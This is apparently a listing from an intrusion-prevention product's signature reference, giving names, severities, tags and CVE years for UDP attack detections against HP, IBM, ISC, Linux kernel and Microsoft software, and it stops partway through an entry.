Tags: Windows, Any Hardware, HP Intelligent Management Center, CVE2011, Windows not specific, HP Intelligent Management Center not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-925-5242
Vulnerability: HP-Intelligent-Management-Center-Dbman-Buffer-Overflow
Description:
Back to top

Generic_UDP-HP-Intelligent-Management-Center-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a HP Intelligent Management Center Stack Based Buffer Overflow vulnerability detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Windows 2003 SP2, Any Hardware, HP Intelligent Management Center UAM, CVE2012, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-705-5211
Vulnerability: HP-Intelligent-Management-Center-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_UDP-HP-Intelligent-Management-Center-Uam.exe-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center UAM detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center UAM, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-475-5211
Last changed: sgpkg-ips-475-5211
Vulnerability: HP-Intelligent-Management-Center-Uam.exe-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Network Node Manager i (NNMi) detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Network Node Manager i, CVE2014, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-607-5211
Vulnerability: HP-Network-Node-Manager-I-Ovopi.dll-Buffer-Overflow
Description:
Back to top

Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-D-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Network Node Manager i (NNMi) detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Network Node Manager i, CVE2014, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: HP-Network-Node-Manager-I-Ovopi.dll-Buffer-Overflow
Description:
Back to top

Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-L-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Network Node Manager i (NNMi) detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Network Node Manager i, CVE2014, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-614-5211
Vulnerability: HP-Network-Node-Manager-I-Ovopi.dll-L-Buffer-Overflow
Description:
Back to top

Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-P-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Network Node Manager i (NNMi) detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Network Node Manager i, CVE2014, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: HP-Network-Node-Manager-I-Ovopi.dll-Buffer-Overflow
Description:
Back to top

Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-T-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Network Node Manager i (NNMi) detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Network Node Manager i, CVE2014, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: HP-Network-Node-Manager-I-Ovopi.dll-Buffer-Overflow
Description:
Back to top

Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-Vulnerable-Command-Usage

About this situation: An attempt to use a vulnerable command in HP Network Node Manager i (NNMi) detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Network Node Manager i, CVE2014, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: HP-Network-Node-Manager-I-Ovopi.dll-Command-685-Memory-Corruption
Description:
Back to top

Generic_UDP-HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution

About this situation: Attempt to exploit a buffer overflow vulnerability in the HP StorageWorks Storage Mirroring Double Take Service over udp detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP StorageWorks Storage Mirroring, CVE2008, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-156-2032
Vulnerability: HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution
Description:
Back to top

Generic_UDP-HPE-Intelligent-Management-Center-Imcwlandm-Ssid-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-949-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: HPE-Intelligent-Management-Center-Imcwlandm-Ssid-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-HPE-Intelligent-Management-Center-Imcwlandm-Username-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-970-5242
Vulnerability: HPE-Intelligent-Management-Center-Imcwlandm-Username-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-IAS-MS-CHAP-V2-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Internet Authentication Service detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IAS, MS2009-12, CVE2009, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: IAS-MS-CHAP-V2-Authentication-Bypass
Description:
Back to top

Generic_UDP-IAX2-Malformed-ACK-Message

About this situation: A malformed IAX2 ACK message detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2008, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-679-5211
Vulnerability: Digium-Asterisk-Multiple-Products-IAX2-Handshake-Denial-Of-Service
Description:
Back to top

Generic_UDP-IBM-Informix-Dynamic-Server-SunRPC-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Informix Dynamic Server detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Informix Dynamic Server, CVE2009, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1060-5242
Vulnerability: IBM-Informix-Dynamic-Server-Librpc.dll-Multiple-Buffer-Overflows
Description:
Back to top

Generic_UDP-IBM-Tivoli-Storage-Manager-Fastback-Mount-Service-Code-Execution

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2010, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-372-4219
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Mount-Service-Code-Execution
Description:
Back to top

Generic_UDP-IBM-Tivoli-Storage-Manager-Fastback-Mount-Service-DoS

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2010, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-372-4219
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Mount-Service-Code-Execution
Description:
Back to top

Generic_UDP-IKEv2-IKE_Sa_Init-Using-PRF_GMAC_md5

About this situation: An IKEv2 packet using PRF_HMAC_MD5 algorithm detected
Context: UDP Packet Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, strongSwan, CVE2018, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: StrongSwan-OpenSSL-Plugin-Fips-Mode-Denial-Of-Service
Description:
Back to top

Generic_UDP-IntelliCom-NetBiter-Config-Utility-Hostname-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IntelliCom NetBiter Config Utility detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, IntelliCom NetBiter Config Utility, CVE2009, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-273-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: IntelliCom-NetBiter-Config-Utility-Hostname-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-Inter-Asterix-Exchange-Version-2-Protocol-New-Call-Request

About this situation: A call initiation request using Inter-Asterix Exchange Version 2 Protocol was seen
Context: UDP Packet Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Digium Asterisk, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-260-3038
Description:
Back to top

Generic_UDP-IPMI-Cipher-Zero-Mode

About this situation: IPMI message with cipher set to zero detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Generic IPMI interface, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-531-5211
Vulnerability: Multiple-IPMI-Cipher-Zero-Vulnerabilities
Description:
Back to top

Generic_UDP-Ipswitch-WS_FTP-Logging-Server-Daemon-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Ipswitch WS_FTP Server detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, WS_FTP Server, CVE2007, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1000-5242
Vulnerability: Ipswitch-WS_FTP-Logging-Server-Daemon-Denial-Of-Service
Description:
Back to top

Generic_UDP-ISC-Bind-Lwresd-Query-Name-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-785-5211
Vulnerability: ISC-Bind-Lwresd-Query-Name-Denial-Of-Service
Description:
Back to top

Generic_UDP-ISC-DHCP-dhclient-Network-Configuration-Script-Command-Injection

About this situation: A vulnerability in ISC DHCP dhclient
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ISC DHCP dhclient, CVE2011, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-450-4333
Vulnerability: Generic_UDP-ISC-DHCP-dhclient-Network-Configuration-Script-Command-Injection
Description:
Back to top

Generic_UDP-ISC-DHCP-dhclient-Pretty_Print_Option-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ISC DHCP dhclient detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ISC DHCP dhclient, CVE2018, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Vulnerability: ISC-DHCP-dhclient-Pretty_Print_Option-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-ISC-DHCP-dhclient-script-write-params-Buffer-Overflow

About this situation: Buffer overflow attack against ISC DHCP dhclient detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ISC DHCP dhclient, CVE2009, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-235-3038
Last changed: sgpkg-ips-564-5211
Vulnerability: DHCP-ISC-DHCP-dhclient-script_write_params-Buffer-Overflow
Description:
Back to top

Generic_UDP-ISC-DHCP-Server-Dhcpv6-Null-Pointer-Dereference

About this situation: An ISC DHCP Server DHCPv6 NULL-Pointer Dereference vulnerability
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ISC DHCP Server, CVE2011, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1005-5242
Vulnerability: ISC-DHCP-Server-Dhcpv6-Null-Pointer-Dereference
Description:
Back to top

Generic_UDP-ISC-DHCP-Server-Duid-Handling-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ISC DHCP Server detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ISC DHCP Server, CVE2012, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-471-5211
Last changed: sgpkg-ips-640-5211
Vulnerability: ISC-DHCP-Server-Duid-Handling-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-Kame-Racoon-X509-Certificate-Verification

About this situation: An attempt to exploit a vulnerability in Kame Project racoon detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, KAME racoon, CVE2004, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Kame-Racoon-X509-Certificate-Verification
Description:
Back to top

Generic_UDP-Kaskad-Dasever-Heap-Overflow

About this situation: An attack against Kaskad Scada detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Kaskad Scada, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Kaskad-Dasever-Heap-Overflow
Description:
Back to top

Generic_UDP-Kerberos-Cross-Realm-Referrals-KDC-Null-Pointer-Dereference-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in MIT Kerberos detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos, CVE2013, Any Operating System not specific, MIT Kerberos not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-595-5211
Vulnerability: Kerberos-Cross-Realm-Referrals-KDC-Null-Pointer-Dereference-Denial-Of-Service
Description:
Back to top

Generic_UDP-Kerberos-Multi-Realm-KDC-Null-Pointer-Dereference-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in MIT Kerberos detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos, CVE2013, Any Operating System not specific, MIT Kerberos not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-1860-5242
Vulnerability: Kerberos-Multi-Realm-KDC-Null-Pointer-Dereference-Denial-Of-Service
Description:
Back to top

Generic_UDP-Libupnp-Device-Service-Name-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Linux SDK for UPnP libupnp detected
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, libupnp, CVE2012, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-813-5242
Vulnerability: Libupnp-Device-Service-Name-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-Libupnp-Devices-Uuid-Service-Name-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Linux SDK for UPnP libupnp detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, libupnp, CVE2012, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-509-5211
Vulnerability: Libupnp-Devices-Uuid-Service-Name-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-Libupnp-Root-Device-Service-Name-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Linux SDK for UPnP libupnp detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, libupnp, CVE2012, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-510-5211
Last changed: sgpkg-ips-510-5211
Vulnerability: Libupnp-Root-Device-Service-Name-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-Linux-Kernel-Cipso-IP-Option-Infinite-Loop-DOS

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Kernel detected
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, CVE2018, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1121-5242
Last changed: sgpkg-ips-1121-5242
Vulnerability: Linux-Kernel-Cipso-IP-Option-Infinite-Loop-DOS
Description:
Back to top

Generic_UDP-Linux-Kernel-ICMP-Packet-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Linux Kernel detected
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, CVE2006, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Vulnerability: Linux-Kernel-ICMP-Packet-Handling-Denial-Of-Service
Description:
Back to top

Generic_UDP-Linux-Kernel-IPv4_pktinfo_prepare-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Kernel detected
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, CVE2017, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-872-5242
Last changed: sgpkg-ips-872-5242
Vulnerability: Linux-Kernel-IPv4_pktinfo_prepare-Denial-Of-Service
Description:
Back to top

Generic_UDP-Linux-Kernel-Nfsd-Subsystem-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Kernel detected
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, CVE2008, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Linux-Kernel-Nfsd-Subsystem-Buffer-Overflow
Description:
Back to top

Generic_UDP-Linux-Kernel-TIPC-Fragment-Handling-Use-After-Free-CVE-2024-36886

About this situation: An attempt to exploit a vulnerability in Linux Kernel detected
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, CVE2024, Linux not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: Linux-Kernel-TIPC-Fragment-Handling-Use-After-Free-CVE-2024-36886
Description:
Back to top

Generic_UDP-Linux-Kernel-TIPC-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the TIPC module of the Linux Kernel detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, CVE2021, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: Linux-Kernel-TIPC-Heap-Buffer-Overflow
Description:
Back to top

Generic_UDP-Linux-Kernel-TIPC-Stack-Buffer-Overflow-CVE-2022-0435

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Kernel detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2022, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1503-5242
Last changed: sgpkg-ips-1622-5242
Vulnerability: Linux-Kernel-TIPC-Stack-Buffer-Overflow-CVE-2022-0435
Description:
Back to top

Generic_UDP-Malicious-Packet

About this situation: A possibly malicious packet was seen
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-579-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

Generic_UDP-MAPI-Microsoft-Exchange-Server-MS09-003-DOS

About this situation: A denial of service exploit against MS Exchange detected
Context: UDP Packet Unknown
Severity: 2
Tags: Windows, x86, Exchange Server 2003, Exchange Server 2000, MS2009-02, CVE2009, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-205-2032
Last changed: sgpkg-ips-254-3038
Vulnerability: UDP-MAPI-Microsoft-Exchange-Server-DOS
Description:
Back to top

Generic_UDP-McAfee-Epolicy-Orchestrator-Framework-Services-Format-String

About this situation: Detected an attempt to exploit a format string vulnerability in McAfee Framework Services
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, McAfee ePolicy Orchestrator, McAfee Agent, McAfee Common Management Agent, CVE2008, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-149-2032
Last changed: sgpkg-ips-149-2032
Vulnerability: McAfee-Epolicy-Orchestrator-Framework-Services-Format-String
Description:
Back to top

Generic_UDP-Measuresoft-ScadaPro-Directory-Traversal

About this situation: A vulnerability in Measuresoft ScadaPro detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Measuresoft ScadaPro, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Measuresoft-ScadaPro-Directory-Traversal
Description:
Back to top

Generic_UDP-Measuresoft-ScadaPro-Remote-Code-Execution

About this situation: A vulnerability in Measuresoft ScadaPro detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Measuresoft ScadaPro, CVE2011, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Measuresoft-ScadaPro-Remote-Code-Execution
Description:
Back to top

Generic_UDP-Media-Services-Buffer-Overflow-CVE-2010-0478

About this situation: An attempt to exploit CVE-2010-0478 over UDP detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows 2000, Any Hardware, MS2010-04, CVE2010, Windows 2000 not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-301-4219
Last changed: sgpkg-ips-302-4219
Vulnerability: Media-Services-Buffer-Overflow-CVE-2010-0478
Description:
Back to top

Generic_UDP-Memcached-Traffic-Amplification-UDP-Packet-Spoofing

About this situation: An attempt to exploit a vulnerability in Memcached Project Memcached detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Memcached, CVE2018, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1054-5242
Last changed: sgpkg-ips-1622-5242
Vulnerability: Memcached-Traffic-Amplification-UDP-Packet-Spoofing
Description:
Back to top

Generic_UDP-Microsoft-DHCP-Server-Service-Remote-Code-Execution-Vulnerability-CVE-2023-28231

About this situation: An attempt to exploit a vulnerability in Microsoft DHCP service detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2023-04, CVE2023, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1577-5242
Last changed: sgpkg-ips-1577-5242
Vulnerability: Microsoft-DHCP-Server-Service-Remote-Code-Execution-Vulnerability-CVE-2023-28231
Description:
Back to top

Generic_UDP-Microsoft-DirectPlay-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft DirectX detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, DirectX, MS2004-06, CVE2004, Windows not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: Microsoft-DirectPlay-Denial-Of-Service
Description:
Back to top

Generic_UDP-Microsoft-Network-Policy-Server-Radius-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2015-01, CVE2015, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-626-5211
Vulnerability: Microsoft-Network-Policy-Server-Radius-Denial-Of-Service
Description:
Back to top

Generic_UDP-Microsoft-Network-Policy-Server-Radius-Denial-Of-Service-CVE-2016-0050

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2016-02, CVE2016, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-733-5211
Last changed: sgpkg-ips-754-5211
Vulnerability: Microsoft-Network-Policy-Server-Radius-Denial-Of-Service-CVE-2016-0050
Description:
Back to top

Generic_UDP-Microsoft-Windows-2000-Domain-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE2004, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-604-5211
Vulnerability: Microsoft-Windows-2000-Domain-Authentication-Bypass
Description:
Back to top

Generic_UDP-Microsoft-Windows-Active-Directory-Browser-Election-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Active Directory detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows 2003, Any Hardware, MS2011-04, CVE2011, Windows 2003 not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-379-4219
Vulnerability: Microsoft-Windows-Active-Directory-Browser-Election-Buffer-Overflow
Description:
Back to top

Generic_UDP-Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow

About this situation: Detected an attempt to exploit a vulnerability in Microsoft Windows' DHCP client
Context: UDP Packet Unknown
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2006-07, CVE2006, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-630-5211
Vulnerability: Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow
Description:
Back to top

Generic_UDP-Microsoft-Windows-Dhcpv6-Client-Parsedhcpv6options-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1171-5242
Vulnerability: Microsoft-Windows-Dhcpv6-Client-Parsedhcpv6options-Code-Execution
Description:
Back to top

Generic_UDP-Microsoft-Windows-DNS-Client-Service-CVE-2011-0657

